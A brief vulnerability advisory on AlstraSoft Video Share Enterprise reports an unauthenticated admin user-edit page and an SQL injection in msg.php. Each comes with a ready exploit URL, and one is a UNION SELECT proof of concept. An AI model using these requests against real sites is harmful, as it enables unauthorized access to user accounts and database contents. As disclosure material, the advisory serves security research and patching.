AlstraSoft Video Share Enterprise - Information disclosure & SQL injection vuln

============================
discovered by : VietMafia
developer's site: www.alstrasoft.com
script: AlstraSoft Video Share Enterprise
risk: medium
status: unpatched
============================

This script has a vuln which can be exploited by malicious people to disclose sensitive information & access to system as administrator.


1.The file siteadmin/useredit.php can be accessed without any authetication. User's info can be viewed & edited after that.

example:

http://host/path/siteadmin/useredit.php?uid=userid

2.SQL injection

after we got access as a registered user there's a sql inj vuln in msg.php file

poc : http://host/path/msg.php?id=-1%20union%20select%201,version(),1,1,1,1,1,1,1

thanks DH for helping me verify this. :)

===============================